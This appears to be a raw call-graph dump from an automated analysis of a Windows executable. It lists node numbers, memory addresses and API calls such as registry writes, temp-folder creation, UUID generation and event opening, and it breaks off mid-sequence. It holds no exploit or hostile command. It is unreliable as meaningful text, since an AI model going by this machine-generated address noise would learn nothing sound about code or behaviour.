GetFileSizeEx 33648->33651 33662 7ff780fcdeb5 33648->33662 33652 7ff780fcdcf9 33649->33652 33653 7ff780fcdec9 33650->33653 33654 7ff780fcde43 GetLocalTime GetTimeFormatW 33651->33654 33655 7ff780fcdd7d 33651->33655 33652->33645 33652->33662 33656 7ff7810a5990 7 API calls 33653->33656 33659 7ff780fce3ac 23 API calls 33654->33659 33657 7ff780fcdd9e SetFilePointer 33655->33657 33658 7ff780fcdd8e SetEndOfFile 33655->33658 33660 7ff780fcded5 33656->33660 33661 7ff780fcddb8 33657->33661 33658->33661 33659->33662 33663 7ff780fcddd5 EnterCriticalSection 33661->33663 33664 7ff780fcddba CloseHandle 33661->33664 33662->33644 33665 7ff780fcddf5 33663->33665 33666 7ff780fcde30 LeaveCriticalSection 33663->33666 33664->33663 33665->33666 33667 7ff780fcddfb WriteFile FlushFileBuffers 33665->33667 33666->33654 33667->33666 33669 7ff7810a4540 numpunct 2 API calls 33668->33669 33670 7ff780fa7fe0 33669->33670 33671 7ff780fa7ff7 33670->33671 33711 7ff780fabed4 29 API calls std::bad_exception::bad_exception 33670->33711 33671->33636 33674 7ff780fa945f GetEnvironmentVariableW 33673->33674 33675 7ff780fa9445 SetLastError 33673->33675 33677 7ff780fa9482 GetLastError 33674->33677 33678 7ff780fa94ab 33674->33678 33676 7ff780fa957d 33675->33676 33676->33640 33676->33641 33677->33678 33680 7ff780fa9492 33677->33680 33679 7ff780fa9563 33678->33679 33682 7ff780fa86a4 30 API calls 33678->33682 33713 7ff780faa8b0 26 API calls std::bad_exception::bad_exception 33679->33713 33681 7ff780fa8410 29 API calls 33680->33681 33684 7ff780fa949a GetLastError 33681->33684 33685 7ff780fa94c3 GetEnvironmentVariableW 33682->33685 33684->33676 33685->33679 33687 7ff780fa94e6 GetLastError 33685->33687 33686 7ff780fa956d SetLastError 33686->33676 33687->33679 33688 7ff780fa94f6 33687->33688 33689 7ff7810a4540 numpunct 2 API calls 33688->33689 33690 7ff780fa94fe 33689->33690 33693 7ff780fa952e 33690->33693 33712 7ff780fac6d0 6 API calls numpunct 33690->33712 33692 7ff780fa955b 33692->33684 33693->33692 33694 7ff780fa9553 33693->33694 33695 7ff7810a458c numpunct free 33693->33695 33696 7ff7810a458c numpunct free 33694->33696 33695->33694 33696->33692 33698 7ff780fa86a4 30 API calls 33697->33698 33699 7ff780fd6f2f 33698->33699 33700 7ff780fa8410 29 API calls 33699->33700 33701 7ff780fd6f37 SHGetFolderPathW 33700->33701 33702 7ff780fd6f64 33701->33702 33703 7ff780fd6f6d 33701->33703 33704 7ff780fa8410 29 API calls 33702->33704 33714 7ff780fa87b4 32 API calls 33703->33714 33706 7ff780fd6f69 33704->33706 33706->33652 33707 7ff780fd6f72 33715 7ff780fd760c 33 API calls 33707->33715 33709 7ff780fd6f7a 33710 7ff780fa8148 39 API calls 33709->33710 33710->33706 33711->33671 33712->33693 33713->33686 33714->33707 33715->33709 33716 7ff780f9e767 GetTempPathW 33717 7ff780f9e788 PathAppendW 33716->33717 33718 7ff780f9e89d 33716->33718 33717->33718 33720 7ff780f9e7ab CreateDirectoryW 33717->33720 33719 7ff780f9e8a4 RpcStringFreeW 33718->33719 33721 7ff780f9e8b5 33718->33721 33719->33721 33722 7ff780f9e7e2 33720->33722 33723 7ff780f9e7cb GetLastError 33720->33723 33724 7ff780fa7e24 free 33721->33724 33725 7ff780faacb8 35 API calls 33722->33725 33723->33718 33723->33722 33726 7ff780f9e8c3 33724->33726 33727 7ff780f9e7f4 UuidCreate 33725->33727 33729 7ff780fa7e24 free 33726->33729 33727->33718 33728 7ff780f9e810 UuidToStringW 33727->33728 33728->33718 33730 7ff780f9e82d PathAppendW 33728->33730 33731 7ff780f9e8ce 33729->33731 33730->33718 33732 7ff780f9e84a 33730->33732 33734 7ff7810a5990 7 API calls 33731->33734 33733 7ff780faacb8 35 API calls 33732->33733 33735 7ff780f9e85c SetEnvironmentVariableW 33733->33735 33736 7ff780fa0474 33734->33736 33735->33718 33737 7ff780f9e87c CreateDirectoryW 33735->33737 33737->33718 33738 7ffe1024c368 33739 7ffe1024c38e 33738->33739 33741 7ffe1024c3d7 33739->33741 33743 7ffe1024c396 33739->33743 33744 7ffe1024c318 33739->33744 33742 7ffe1024c318 132 API calls 33741->33742 33741->33743 33742->33743 33745 7ffe1024c180 __scrt_acquire_startup_lock 33744->33745 33745->33744 33746 7ffe1024c325 33745->33746 33754 7ffe1024c2d8 33745->33754 33755 7ffe1024c8f0 7 API calls 33745->33755 33758 7ffe1024c1c5 33745->33758 33767 7ffe1024c207 __CxxCallCatchBlock __scrt_release_startup_lock 33745->33767 33770 7ffe1024c6bc 33745->33770 33747 7ffe1024c340 33746->33747 33748 7ffe1024c32a 33746->33748 33785 7ffe1024c8a0 20 API calls 33747->33785 33750 7ffe1024c32f 33748->33750 33784 7ffe1024c8c8 20 API calls 33748->33784 33750->33741 33753 7ffe1024c33e 33753->33741 33780 7ffe1024c85c 23 API calls __scrt_acquire_startup_lock 33754->33780 33755->33745 33757 7ffe1024c2dd 33781 7ffe1024c58c InterlockedFlushSList __std_exception_copy 33757->33781 33778 7ffe1024c810 7 API calls 33758->33778 33761 7ffe1024c2e2 _RTC_Initialize __scrt_release_startup_lock 33782 7ffe1024c6f8 109 API calls 33761->33782 33762 7ffe1024c1d4 _RTC_Initialize 33762->33767 33779 7ffe1024c57c InitializeSListHead 33762->33779 33765 7ffe1024c2ff 33783 7ffe1024c88c 6 API calls __vcrt_uninitialize_ptd 33765->33783 33767->33741 33771 7ffe1024c6c4 33770->33771 33772 7ffe1024c6d0 __scrt_dllmain_crt_thread_attach 33771->33772 33773 7ffe1024c6dd 33772->33773 33774 7ffe1024c6d9 33772->33774 33786 7ffe1024d300 33773->33786 33774->33745 33778->33762 33780->33757 33781->33761 33782->33765 33783->33767 33784->33753 33785->33753 33788 7ffe10250080 33786->33788 33787 7ffe1024c6e2 33787->33774 33790 7ffe1024d170 7 API calls 2 library calls 33787->33790 33788->33787 33791 7ffe1024f1d4 33788->33791 33790->33774 33802 7ffe1024ea58 EnterCriticalSection 33791->33802 33793 7ffe1024f1e4 33794 7ffe10253264 65 API calls 33793->33794 33795 7ffe1024f1ed 33794->33795 33796 7ffe1024f250 67 API calls 33795->33796 33801 7ffe1024f1fb 33795->33801 33798 7ffe1024f1f6 33796->33798 33797 7ffe1024ea74 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 33799 7ffe1024f207 33797->33799 33800 7ffe1024f340 GetStdHandle GetFileType 33798->33800 33799->33788 33800->33801 33801->33797 33803 7ff780fad00c 33804 7ff780fae3eb _CxxThrowException 33803->33804 33805 7ff780fad05b 33803->33805 33807 7ff780fae3ff _CxxThrowException 33804->33807 34233 7ff780fab974 33805->34233 33809 7ff780fae413 _CxxThrowException 33807->33809 33811 7ff780fae427 _CxxThrowException 33809->33811 33810 7ff780fdb218 3 API calls 33817 7ff780fad074 33810->33817 33812 7ff780fae43b _CxxThrowException 33811->33812 33814 7ff780fae44f _CxxThrowException 33812->33814 33813 7ff780fad11e 33816 7ff780fae3d7 _CxxThrowException 33813->33816 33819 7ff780fae3a3 33813->33819 34241 7ff780fa8ee8 33813->34241 33815 7ff780fae463 _CxxThrowException 33814->33815 33818 7ff780fae477 _CxxThrowException 33815->33818 33816->33804 33817->33813 33821 7ff780fa8010 7 API calls 33817->33821 33822 7ff780fae48b _CxxThrowException 33818->33822 33823 7ff780fdc700 93 API calls 33819->33823 33825 7ff780fad0aa 33821->33825 33826 7ff780fae49f _CxxThrowException 33822->33826 33827 7ff780fae3bc 33823->33827 33829 7ff780faf0dc 33 API calls 33825->33829 33830 7ff780fae4b3 _CxxThrowException 33826->33830 34314 7ff780fcedc4 36 API calls numpunct 33827->34314 33841 7ff780fad0b8 33829->33841 33833 7ff780fae4c7 _CxxThrowException 33830->33833 33831 7ff780fad1c6 33831->33816 33832 7ff780fae84b _CxxThrowException 33834 7ff780fae4db _CxxThrowException 33833->33834 33837 7ff780fae4ef _CxxThrowException 33834->33837 33835 7ff780fad1cb 33838 7ff780fa7fbc 29 API calls 33835->33838 33836 7ff780fad0e0 33840 7ff780fa7e24 free 33836->33840 33843 7ff780fae503 _CxxThrowException 33837->33843 33844 7ff780fad1d9 33838->33844 33839 7ff780fad147 33839->33832 33839->33835 33858 7ff780fad199 33839->33858 33845 7ff780fad0f1 33840->33845 33841->33836 33842 7ff780fad0d8 33841->33842 33846 7ff7810a458c numpunct free 33841->33846 33849 7ff7810a458c numpunct free 33842->33849 33847 7ff780fae517 _CxxThrowException 33843->33847 33848 7ff780fae837 _CxxThrowException 33844->33848 33852 7ff780fae36d 33844->33852 34245 7ff780fa9268 33844->34245 34273 7ff780faecc8 52 API calls 33845->34273 33846->33842 33851 7ff780fae52b _CxxThrowException 33847->33851 33848->33832 33849->33836 33854 7ff780fae53f _CxxThrowException 33851->33854 33856 7ff780fdc700 93 API calls 33852->33856 33853 7ff780fad108 34274 7ff780fdb318 RegOpenKeyExW RegSetValueExW RegCloseKey 33853->34274 33859 7ff780fae553 _CxxThrowException 33854->33859 33861 7ff780fae386 33856->33861 33863 7ff780fdc700 93 API calls 33858->33863 33864 7ff780fae567 _CxxThrowException 33859->33864 34313 7ff780fcedc4 36 API calls numpunct 33861->34313 33862 7ff780fad114 33867 7ff780fa7e24 free 33862->33867 33868 7ff780fad1b2 33863->33868 33869 7ff780fae57b _CxxThrowException 33864->33869 33865 7ff780fad207 33870 7ff780fa7e24 free 33865->33870 33867->33813 34275 7ff780fcedc4 36 API calls numpunct 33868->34275 33873 7ff780fae58f _CxxThrowException 33869->33873 33874 7ff780fad210 33870->33874 33871 7ff780fae397 33875 7ff780fa7e24 free 33871->33875 33876 7ff780fae5a3 _CxxThrowException 33873->33876 33877 7ff780fae823 _CxxThrowException 33874->33877 33879 7ff780fa9210 50 API calls 33874->33879 33875->33831 33878 7ff780fae5b7 _CxxThrowException 33876->33878 33877->33848 33880 7ff780fae5cb _CxxThrowException 33878->33880 33881 7ff780fad233 33879->33881 33882 7ff780fae5df _CxxThrowException 33880->33882 33883 7ff780fae80f _CxxThrowException 33881->33883 34262 7ff780faf214 33881->34262 33884 7ff780fae5f3 _CxxThrowException 33882->33884 33883->33877 33886 7ff780fae607 _CxxThrowException 33884->33886 33888 7ff780fae61b _CxxThrowException 33886->33888 33889 7ff780fae62f _CxxThrowException 33888->33889 33890 7ff780fae643 _CxxThrowException 33889->33890 33892 7ff780fae657 _CxxThrowException 33890->33892 33891 7ff780fa7fbc 29 API calls 33893 7ff780fad286 33891->33893 33894 7ff780fae66b _CxxThrowException 33892->33894 33895 7ff780fa80d4 6 API calls 33893->33895 33896 7ff780fae67f _CxxThrowException 33894->33896 33897 7ff780fad290 33895->33897 33898 7ff780fae693 _CxxThrowException 33896->33898 33899 7ff780fad2a7 33897->33899 33901 7ff780fa9268 45 API calls 33897->33901 33900 7ff780fae6a7 _CxxThrowException 33898->33900 33902 7ff780fa25a8 45 API calls 33899->33902 33903 7ff780fae6bb _CxxThrowException 33900->33903 33901->33899 33904 7ff780fad2b7 33902->33904 33905 7ff780fae6cf _CxxThrowException 33903->33905 33906 7ff780fad2cb 33904->33906 33908 7ff780fa25a8 45 API calls 33904->33908 33907 7ff780fae6e3 _CxxThrowException 33905->33907 33909 7ff780fa7e24 free 33906->33909 33910 7ff780fae6f7 _CxxThrowException 33907->33910 33908->33906 33911 7ff780fad2df 33909->33911 33912 7ff780fae70b _CxxThrowException 33910->33912 33913 7ff780fa7e24 free 33911->33913 33914 7ff780fae71f _CxxThrowException 33912->33914 33915 7ff780fad2e9 33913->33915 33916 7ff780fae733 _CxxThrowException 33914->33916 33917 7ff780fae7fb _CxxThrowException 33915->33917 33920 7ff780fa9210 50 API calls 33915->33920 33918 7ff780fae747 _CxxThrowException 33916->33918 33917->33883 33919 7ff780fae75b _CxxThrowException 33918->33919 33921 7ff780fae76f _CxxThrowException 33919->33921 33922 7ff780fad30c 33920->33922 33923 7ff780fae783 _CxxThrowException 33921->33923 33924 7ff780fae7e7 _CxxThrowException 33922->33924 33926 7ff780fa9210 50 API calls 33922->33926 33925 7ff780fae797 _CxxThrowException 33923->33925 33924->33917 33927 7ff780fae7ab _CxxThrowException 33925->33927 33928 7ff780fad335 33926->33928 33929 7ff780fae7bf _CxxThrowException 33927->33929 33930 7ff780fad357 33928->33930 33931 7ff780fad38d 33928->33931 33932 7ff780fae7d3 _CxxThrowException 33929->33932 33933 7ff7810a5990 7 API calls 33930->33933 33934 7ff780fa80d4 6 API calls 33931->33934 33932->33924 33936 7ff780fad365 33933->33936 33935 7ff780fad396 33934->33935 33935->33932 33937 7ff780fa9210 50 API calls 33935->33937 33938 7ff780fad3be 33937->33938 33938->33812 33963 7ff780fad45f 33938->33963 34276 7ff780fab568 47 API calls std::bad_exception::bad_exception 33938->34276 33940 7ff780fa9210 50 API calls 33941 7ff780fad49b 33940->33941 33941->33815 33989 7ff780fad533 33941->33989 34277 7ff780faf2ec 35 API calls std::bad_exception::bad_exception 33941->34277 33942 7ff780fad426 33943 7ff780fa7e24 free 33942->33943 33948 7ff780fad43a 33943->33948 33945 7ff780fa9210 50 API calls 33949 7ff780fad55c 33945->33949 33946 7ff780fad4e6 33954 7ff780fa7e24 free 33946->33954 33947 7ff780fad4c0 33947->33946 33957 7ff780fad4de 33947->33957 33961 7ff7810a458c numpunct free 33947->33961 33948->33809 33952 7ff780fa8be8 34 API calls 33948->33952 33949->33822 33953 7ff780fad61c 33949->33953 34280 7ff780fab568 47 API calls std::bad_exception::bad_exception 33949->34280 33950 7ff780fad3e8 33950->33811 33950->33942 33951 7ff780fad41e 33950->33951 33955 7ff7810a458c numpunct free 33950->33955 33956 7ff7810a458c numpunct free 33951->33956 33958 7ff780fad44f 33952->33958 33953->33925 33960 7ff780fa9210 50 API calls 33953->33960 33959 7ff780fad4fb 33954->33959 33955->33951 33956->33942 33962 7ff7810a458c numpunct free 33957->33962 33958->33807 33958->33963 34278 7ff780faf088 GetStringTypeExW 33959->34278 33966 7ff780fad646 33960->33966 33961->33957 33962->33946 33963->33929 33963->33940 33990 7ff780fad467 33963->33990 33966->33830 33968 7ff780fad749 33966->33968 34281 7ff780fab568 47 API calls std::bad_exception::bad_exception 33966->34281 33967 7ff780fad504 33967->33814 33972 7ff780fad518 33967->33972 33967->33989 33968->33923 33975 7ff780fa9210 50 API calls 33968->33975 33969 7ff780fad5a8 33970 7ff780fa7e24 free 33969->33970 33973 7ff780fad5bd 33970->33973 34279 7ff780fab568 47 API calls std::bad_exception::bad_exception 33972->34279 33979 7ff780fa8be8 34 API calls 33973->33979 33980 7ff780fad773 33975->33980 33976 7ff780fad5a0 33983 7ff7810a458c numpunct free 33976->33983 33977 7ff780fad586 33977->33969 33977->33976 33981 7ff7810a458c numpunct free 33977->33981 33984 7ff780fad5c6 33979->33984 33980->33834 33987 7ff780fad833 33980->33987 34282 7ff780fab568 47 API calls std::bad_exception::bad_exception 33980->34282 33981->33976 33982 7ff780fad52a 33988 7ff780fa7e24 free 33982->33988 33983->33969 33984->33818 33984->33990 34008 7ff780fad5ef 33984->34008 33985 7ff780fad692 33991 7ff780fa7e24 free 33985->33991 33986 7ff780fa7e24 free 33986->33990 33987->33921 33993 7ff780fa9210 50 API calls 33987->33993 33988->33989 33989->33927 33989->33945 33990->33986 33998 7ff780fdc700 93 API calls 33990->33998 34312 7ff780fcedc4 36 API calls numpunct 33990->34312 33992 7ff780fad6a7 33991->33992 33997 7ff780fa8be8 34 API calls 33992->33997 33999 7ff780fad85d 33993->33999 33994 7ff780fad670 33994->33985 33995 7ff780fad68a 33994->33995 34000 7ff7810a458c numpunct free 33994->34000 34001 7ff7810a458c numpunct free 33995->34001 34003 7ff780fad6b0 33997->34003 33998->33990 33999->33843 34004 7ff780fad90d 33999->34004 34283 7ff780fab568 47 API calls std::bad_exception::bad_exception 33999->34283 34000->33995 34001->33985 34002 7ff780fad7bf 34007 7ff780fa7e24 free 34002->34007 34005 7ff780faf0dc 33 API calls 34003->34005 34004->33869 34006 7ff780fadaa9 34004->34006 34018 7ff780fa9210 50 API calls 34004->34018 34028 7ff780fad6bd 34005->34028 34006->33919 34016 7ff780fa9210 50 API calls 34006->34016 34011 7ff780fad7d4 34007->34011 34008->33953 34012 7ff780fad614 34008->34012 34020 7ff7810a458c numpunct free 34008->34020 34009 7ff780fad79d 34009->34002 34010 7ff780fad7b7 34009->34010 34014 7ff7810a458c numpunct free 34009->34014 34017 7ff7810a458c numpunct free 34010->34017 34019 7ff780fa8be8 34 API calls 34011->34019 34021 7ff7810a458c numpunct free 34012->34021 34014->34010 34015 7ff780fad6e6 34025 7ff780fa7e24 free 34015->34025 34022 7ff780fadacc 34016->34022 34017->34002 34023 7ff780fad944 34018->34023 34024 7ff780fad7dd 34019->34024 34020->34012 34021->33953 34030 7ff780fadc09 34022->34030 34037 7ff780fa80d4 6 API calls 34022->34037 34023->33851 34031 7ff780fada05 34023->34031 34284 7ff780fab568 47 API calls std::bad_exception::bad_exception 34023->34284 34024->33833 34024->33990 34049 7ff780fad806 34024->34049 34032 7ff780fad6f7 34025->34032 34026 7ff780fad8a9 34027 7ff780fa7e24 free 34026->34027 34035 7ff780fad8be 34027->34035 34028->34015 34029 7ff780fad6de 34028->34029 34036 7ff7810a458c numpunct free 34028->34036 34038 7ff7810a458c numpunct free 34029->34038 34030->33918 34042 7ff780fa9210 50 API calls 34030->34042 34031->33864 34031->34006 34045 7ff780fa9210 50 API calls 34031->34045 34032->33826 34032->33990 34055 7ff780fad71c 34032->34055 34033 7ff780fad8a1 34040 7ff7810a458c numpunct free 34033->34040 34034 7ff780fad887 34034->34026 34034->34033 34039 7ff7810a458c numpunct free 34034->34039 34041 7ff780fa8be8 34 API calls 34035->34041 34036->34029 34043 7ff780fadae2 34037->34043 34038->34015 34039->34033 34040->34026 34046 7ff780fad8c7 34041->34046 34047 7ff780fadc2c 34042->34047 34043->33873 34048 7ff780fadaf3 34043->34048 34050 7ff780fada3c 34045->34050 34046->33837 34046->34004 34082 7ff780fad8e0 34046->34082 34051 7ff780fadd13 34047->34051 34058 7ff780fa80d4 6 API calls 34047->34058 34286 7ff780fab568 47 API calls std::bad_exception::bad_exception 34048->34286 34049->33987 34054 7ff780fad82b 34049->34054 34059 7ff7810a458c numpunct free 34049->34059 34050->33854 34057 7ff780fada69 34050->34057 34064 7ff780fada56 34050->34064 34051->33916 34063 7ff780fa9210 50 API calls 34051->34063 34053 7ff780fad990 34056 7ff780fa7e24 free 34053->34056 34061 7ff7810a458c numpunct free 34054->34061 34055->33968 34060 7ff780fad741 34055->34060 34076 7ff7810a458c numpunct free 34055->34076 34062 7ff780fad9a5 34056->34062 34057->33859 34057->34006 34066 7ff780fada83 34057->34066 34065 7ff780fadc3d 34058->34065 34059->34054 34077 7ff7810a458c numpunct free 34060->34077 34061->33987 34072 7ff780fa8be8 34 API calls 34062->34072 34073 7ff780fadd36 34063->34073 34078 7ff780fa9210 50 API calls 34064->34078 34065->33876 34074 7ff780fadc4e 34065->34074 34285 7ff780fa9904 49 API calls numpunct 34066->34285 34067 7ff780fadb2b 34075 7ff780fa7e24 free 34067->34075 34068 7ff780fad96e 34068->34053 34069 7ff780fad988 34068->34069 34070 7ff7810a458c numpunct free 34068->34070 34071 7ff7810a458c numpunct free 34069->34071 34070->34069 34071->34053 34081 7ff780fad9ae 34072->34081 34073->33914 34088 7ff780fa9210 50 API calls 34073->34088 34289 7ff780fab568 47 API calls std::bad_exception::bad_exception 34074->34289 34080 7ff780fadb40 34075->34080 34076->34060 34077->33968 34078->34057 34092 7ff780fa8be8 34 API calls 34080->34092 34081->33847 34081->33990 34112 7ff780fad9d8 34081->34112 34082->34004 34089 7ff780fad905 34082->34089 34093 7ff7810a458c numpunct free 34082->34093 34084 7ff780fadb23 34091 7ff7810a458c numpunct free 34084->34091 34085 7ff780fadb05 34085->34067 34085->34084 34090 7ff7810a458c numpunct free 34085->34090 34086 7ff780fada96 34087 7ff780fa2944 38 API calls 34086->34087 34095 7ff780fadaa1 34087->34095 34098 7ff780fadd5f 34088->34098 34096 7ff7810a458c numpunct free 34089->34096 34090->34084 34091->34067 34097 7ff780fadb49 34092->34097 34093->34089 34094 7ff780fadc86 34101 7ff780fa7e24 free 34094->34101 34099 7ff780fa28c4 36 API calls 34095->34099 34096->34004 34102 7ff780fadb52 34097->34102 34103 7ff780fadb7e OpenEventW 34097->34103 34098->33878 34100 7ff780faddd5 34098->34100 34108 7ff780fadd79 34098->34108 34099->34006 34100->33912 34116 7ff780fa9210 50 API calls 34100->34116 34106 7ff780fadc9b 34101->34106 34107 7ff780fdc700 93 API calls 34102->34107 34109 7ff780fadc00 34103->34109 34110 7ff780fadb9e GetLastError 34103->34110 34104 7ff780fadc60 34104->34094 34105 7ff780fadc7e 34104->34105 34114 7ff7810a458c numpunct free 34104->34114 34115 7ff7810a458c numpunct free 34105->34115 34117 7ff780fa8be8 34 API calls 34106->34117 34118 7ff780fadb6b 34107->34118 34113 7ff780fa8410 29 API calls 34108->34113 34111 7ff780fa7e24 free 34109->34111 34119 7ff780fdc99c 34110->34119 34111->34030 34112->34031 34124 7ff780fad9fd 34112->34124 34127 7ff7810a458c numpunct free 34112->34127 34125 7ff780fadd81 UuidCreateNil UuidCreate UuidToStringW 34113->34125 34114->34105 34115->34094 34121 7ff780faddf8 34116->34121 34122 7ff780fadca4 34117->34122 34287 7ff780fcedc4 36 API calls numpunct 34118->34287 34120 7ff780fadbc6 SetLastError GetLastError 34119->34120 34288 7ff780fce694 55 API calls numpunct 34120->34288 34121->33910 34133 7ff780fa9210 50 API calls 34121->34133 34130 7ff780fadcba OpenEventW 34122->34130 34131 7ff780fadcad 34122->34131 34129 7ff7810a458c numpunct free 34124->34129 34125->34100 34128 7ff780faddb9 34125->34128 34127->34124 34132 7ff780faacb8 35 API calls 34128->34132 34129->34031 34130->34131 34134 7ff780fadd0a 34130->34134 34138 7ff780fdc700 93 API calls 34131->34138 34136 7ff780faddc5 RpcStringFreeW 34132->34136 34137 7ff780fade21 34133->34137 34135 7ff780fa7e24 free 34134->34135 34135->34051 34136->34100 34137->33907 34142 7ff780fa9210 50 API calls 34137->34142 34139 7ff780fadcf3 34138->34139 34290 7ff780fcedc4 36 API calls numpunct 34139->34290 34140 7ff780fadb7c 34143 7ff780fa7e24 free 34140->34143 34144 7ff780fade4a 34142->34144 34143->33990 34144->33905 34145 7ff780fa9210 50 API calls 34144->34145 34146 7ff780fade73 34145->34146 34146->33880 34147 7ff780fadedc 34146->34147 34148 7ff780fade87 34146->34148 34147->33903 34150 7ff780fa9210 50 API calls 34147->34150 34291 7ff780fab568 47 API calls std::bad_exception::bad_exception 34148->34291 34155 7ff780fadeff 34150->34155 34151 7ff780fade99 34292 7ff780faeeec GetStringTypeExW iswdigit iswdigit 34151->34292 34153 7ff780fae03c 34153->33900 34156 7ff780fa9210 50 API calls 34153->34156 34154 7ff780fadead 34293 7ff780faefd8 GetStringTypeExW iswdigit iswdigit 34154->34293 34155->33884 34155->34153 34294 7ff780fab568 47 API calls std::bad_exception::bad_exception 34155->34294 34160 7ff780fae05f 34156->34160 34158 7ff780fadebf 34163 7ff780fadfff 34158->34163 34165 7ff780faded3 34158->34165 34160->33886 34162 7ff780fae122 34160->34162 34167 7ff780fae07f 34160->34167 34161 7ff780fadf42 34295 7ff780faf088 GetStringTypeExW 34161->34295 34162->33898 34169 7ff780fa9210 50 API calls 34162->34169 34164 7ff780fdc700 93 API calls 34163->34164 34170 7ff780fae018 34164->34170 34171 7ff780fa7e24 free 34165->34171 34167->33990 34301 7ff780fab568 47 API calls std::bad_exception::bad_exception 34167->34301 34168 7ff780fadf4c 34168->33882 34174 7ff780fae033 34168->34174 34176 7ff780fadf64 34168->34176 34172 7ff780fae145 34169->34172 34300 7ff780fcedc4 36 API calls numpunct 34170->34300 34171->34147 34172->33888 34178 7ff780fae221 34172->34178 34180 7ff780fae15d 34172->34180 34179 7ff780fa7e24 free 34174->34179 34296 7ff780fab568 47 API calls std::bad_exception::bad_exception 34176->34296 34177 7ff780fae09d 34302 7ff780fa9080 iswdigit _wtof GetStringTypeExW 34177->34302 34178->33896 34183 7ff780fa9210 50 API calls 34178->34183 34179->34153 34180->33990 34306 7ff780fab568 47 API calls std::bad_exception::bad_exception 34180->34306 34186 7ff780fae244 34183->34186 34184 7ff780fadf75 34188 7ff780fa7e24 free 34184->34188 34185 7ff780fae0b0 34303 7ff780faf088 GetStringTypeExW 34185->34303 34186->33894 34193 7ff780fa9210 50 API calls 34186->34193 34190 7ff780fadf7e 34188->34190 34297 7ff780fa9080 iswdigit _wtof GetStringTypeExW 34190->34297 34191 7ff780fae0c6 34196 7ff780fae119 34191->34196 34304 7ff780fa9134 iswdigit iswdigit iswdigit GetStringTypeExW 34191->34304 34192 7ff780fae17b 34307 7ff780fa9080 iswdigit _wtof GetStringTypeExW 34192->34307 34199 7ff780fae267 34193->34199 34198 7ff780fa7e24 free 34196->34198 34197 7ff780fae18e 34308 7ff780faf088 GetStringTypeExW 34197->34308 34198->34162 34202 7ff780fae2ae 34199->34202 34207 7ff780fdb218 3 API calls 34199->34207 34200 7ff780fadf90 34298 7ff780fa9134 iswdigit iswdigit iswdigit GetStringTypeExW 34200->34298 34202->33892 34212 7ff780fa9210 50 API calls 34202->34212 34205 7ff780fae0d3 34205->34196 34209 7ff780fae0e1 34205->34209 34206 7ff780fae1a4 34213 7ff780fae218 34206->34213 34309 7ff780fa9134 iswdigit iswdigit iswdigit GetStringTypeExW 34206->34309 34222 7ff780fae28c 34207->34222 34208 7ff780fadfa6 34208->34174 34210 7ff780fadfbc 34208->34210 34211 7ff780fdc700 93 API calls 34209->34211 34214 7ff780fdc700 93 API calls 34210->34214 34215 7ff780fae102 34211->34215 34217 7ff780fae2d1 34212->34217 34216 7ff780fa7e24 free 34213->34216 34219 7ff780fadfe4 34214->34219 34305 7ff780fcedc4 36 API calls numpunct 34215->34305 34216->34178 34217->33890 34224 7ff780fa9210 50 API calls 34217->34224 34299 7ff780fcedc4 36 API calls numpunct 34219->34299 34221 7ff780fae1b1 34221->34213 34225 7ff780fae1bf 34221->34225 34222->34202 34311 7ff780fdb318 RegOpenKeyExW RegSetValueExW RegCloseKey 34222->34311 34227 7ff780fae2fa 34224->34227 34228 7ff780fdc700 93 API calls 34225->34228 34227->33889 34229 7ff780fae310 34227->34229 34230 7ff780fae1e0 34228->34230 34231 7ff780fa9210 50 API calls 34229->34231 34310 7ff780fcedc4 36 API calls numpunct 34230->34310 34231->33990 34234 7ff780fa8410 29 API calls 34233->34234 34235 7ff780fab982 GetCommandLineW 34234->34235 34236 7ff780fab9ad 34235->34236 34237 7ff780fab995 34235->34237 34236->33810 34237->34236 34238 7ff780faacb8 35 API calls 34237->34238 34239 7ff780fab9a5 34238->34239 34240 7ff780fa8be8 34 API calls 34239->34240 34240->34236 34242 7ff780fa8f51 34241->34242 34244 7ff780fa8efc 34241->34244 34242->33819 34242->33839 34243 7ff780fa8f02 GetStringTypeExW 34243->34244 34244->34242 34244->34243 34246 7ff780fa9630 7 API calls 34245->34246 34247 7ff780fa928a 34246->34247 34248 7ff780fa9630 7 API calls 34247->34248 34249 7ff780fa9299 GetStringTypeExW 34248->34249 34252 7ff780fa92e1 34249->34252 34250 7ff780fa9341 34253 7ff780fa9380 34250->34253 34254 7ff780fa9356 34250->34254 34261 7ff780fa93f9 34250->34261 34251 7ff780fa92fd GetStringTypeExW 34251->34252 34252->34250 34252->34251 34252->34261 34256 7ff780fa9386 GetStringTypeExW 34253->34256 34257 7ff780fa9364 34253->34257 34315 7ff780fab800 30 API calls std::bad_exception::bad_exception 34254->34315 34256->34253 34257->34261 34316 7ff780fa8224 37 API calls 34257->34316 34259 7ff780fa93de 34317 7ff780faad80 40 API calls std::bad_exception::bad_exception 34259->34317 34261->33852 34261->33865 34263 7ff780faf23e 34262->34263 34264 7ff780faf234 34262->34264 34266 7ff780fad257 34263->34266 34319 7ff780fa8338 38 API calls std::bad_exception::bad_exception 34263->34319 34318 7ff780faf508 33 API calls 34264->34318 34266->33891 34268 7ff780faf262 34269 7ff780faf2ab 34268->34269 34270 7ff780fa9630 7 API calls 34268->34270 34269->34266 34320 7ff780fa8338 38 API calls std::bad_exception::bad_exception 34269->34320 34272 7ff780faf272 GetStringTypeExW 34270->34272 34272->34269 34273->33853 34274->33862 34275->33831 34276->33950 34277->33947 34278->33967 34279->33982 34280->33977 34281->33994 34282->34009 34283->34034 34284->34068 34285->34086 34286->34085 34287->34140 34288->34140 34289->34104 34290->34140 34291->34151 34292->34154 34293->34158 34294->34161 34295->34168 34296->34184 34297->34200 34298->34208 34299->34140 34300->34140 34301->34177 34302->34185 34303->34191 34304->34205 34305->34140 34306->34192 34307->34197 34308->34206 34309->34221 34310->34140 34311->34202 34312->33990 34313->33871 34314->33831 34315->34257 34316->34259 34317->34261 34318->34263 34319->34268 34320->34266 34321 7ff780f9ec8d 34322 7ff780fa0726 _CxxThrowException 34321->34322 34323 7ff780f9ec9d 34321->34323 34325 7ff780fa0741 _CxxThrowException 34322->34325 34324 7ff780fdc700 93 API calls 34323->34324 34326 7ff780f9ecb0 34324->34326 34327 7ff780fa075d _CxxThrowException 34325->34327 34328 7ff780fa9c0c 38 API calls 34326->34328 34329 7ff780fa0779 _CxxThrowException 34327->34329 34330 7ff780f9ecbf 34328->34330 34331 7ff780fa078e _CxxThrowException 34329->34331 34332 7ff780fa2944 38 API calls 34330->34332 34333 7ff780fa07a3 _CxxThrowException 34331->34333 34334 7ff780f9ecca 34332->34334 34335 7ff780fa07b8 _CxxThrowException 34333->34335 34336 